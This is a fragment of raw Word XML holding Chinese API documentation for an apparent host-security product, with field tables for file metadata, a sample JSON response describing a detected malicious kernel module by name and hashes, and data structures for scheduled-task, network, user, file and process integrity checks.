      <w:tr w:rsidR="00497C54" w14:paraId="51ED0AFA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B6DF467" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>modify_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6445D487" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65F73953" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="585F0FC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件内容修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="106671CD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DCAEFD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>change_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D5ED3FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79F720B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件属性修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18AF1933" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="357A54F2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="452888C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F1358A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="643D3198" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AA48B22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C8C33A5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3119873B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B65A891" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46009D1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20984498" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="75107161" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79A5EBCC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D53ED6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47C7E289" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A4A7251" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12DA7BEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D0AC94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "malicious_name":"vmci.ko",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_sha256":"798bea1cc8a7241df97abb1b4e85ab94b98e4a3a100757498008bf24fd831c8b",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_sha1":"f8bc6aa9a6409c67881c250057adc44e3246a52e",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_name":"/lib/modules/2.6.32-754.3.5.el6.x86_64/misc/vmci.ko",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "access_time":1536084007,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "file_md5":"2cc8051c7d9d2bc0ed5e3546f8701e47",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_permission":"rw-r--r--",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "modify_time":1535886506,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "change_time":1535886506,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_owner":"root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_size":131432,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_group":"root"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A798B2B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="243" w:name="检查功能计划任务检查--网络状态检查用户状态检查系统文件状态检查进程状态检查"/>
      <w:bookmarkEnd w:id="240"/>
      <w:bookmarkEnd w:id="242"/>
      <w:r>
        <w:t>检查功能：计划任务检查 \ 网络状态检查\用户状态检查系统文件状态检查\进程状态检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DCF5EC"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1380"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="3169"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="32834D2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ED3179A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="333D69FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56177F8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E8514FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2F078F03" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7232EAAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26616961" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02147E31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6739CA02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查的命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="586A9F7A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5006403A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ADADE9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="599B1C4D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E99AC10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被几种检查方式检查出问题</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="364A0DCA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D74F7F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>match_rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B59A71B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="196C91A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="751B604B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>匹配的规则，是字符串模式的结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3688BBC3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51FFD1A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>local_more</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E19DFC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21AA0040" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11D86AE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>运行命令的diff</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="731176BE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3697FE02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>local_less</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FF86837" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77C30FD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1143DA11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>运行命令的diff</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1E50FEBB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00055C8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pkg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68BC34B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="173EF965" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65F25FC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>包完整性结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24491092" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pkg数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2087"/>
        <w:gridCol w:w="828"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="1594"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="165C3EB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20D7334" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79095446" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75F2FF15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0630BA00" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="010FA323" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BDF76A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>package_full_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76D6F180" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EFBB4CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0954460A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>完整包名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7B0B03AB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FF21D5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>package_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="165CE2E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0479C217" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E179DBC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>简单包名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3EF569D1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7098B72C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>package_version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DB7FD29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0677D036" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D7B5194" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>包版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4B0F19F9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67E9429A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AACF950" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58E57D6E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7709B91A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>涉及的文件列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D64454B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>file数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1599"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="2775"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="234346F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AC30DF0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17FA72CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E12E84D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
